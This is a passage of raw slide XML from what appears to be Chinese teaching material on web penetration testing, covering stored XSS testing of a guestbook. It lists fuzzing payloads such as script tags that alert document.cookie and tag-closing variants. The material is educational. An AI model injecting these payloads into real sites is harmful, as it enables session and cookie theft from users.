              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。像之前</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>就出现过缓冲区溢出漏</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。当然，对这类服务还 有其他入侵方式，这些方式也经常用于内网的渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>服务也是</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>服务 之</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>一</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>服务相对于其他服务而言，渗透的方式增加了许</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>多</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，本章将重点介绍 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>服务的渗透性测</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>试</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>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5</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61117" y="621993"/>
            <a:ext cx="1593850" cy="245110"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">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0">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715397" y="836640"/>
            <a:ext cx="3359150" cy="366395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="44450" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下面来测试具体的存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>漏洞，步骤如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="77700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>添加正常的留</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>言</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，昵称</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="35">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Xxser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>留言内容为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HelloWorld</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Firebug</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>网页浏 览器</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Mozilla</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下的一款开发类扩展）快速寻找显示标</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>签</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，发现标签为：</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715396" y="1599602"/>
            <a:ext cx="3411854" cy="741045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="38735" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" marR="67310" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="77700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="305"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>如果显示区域不在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>属性内，则可以直接使用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码注入。如果不能得知 内容输出的具体位置，则可以使用模糊测试方</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>案，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(document.cookie)&lt;/scrip&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>普通注</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>"/script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>闭合标签注</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;/textarea&gt;"&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>闭合标签注</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="77700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
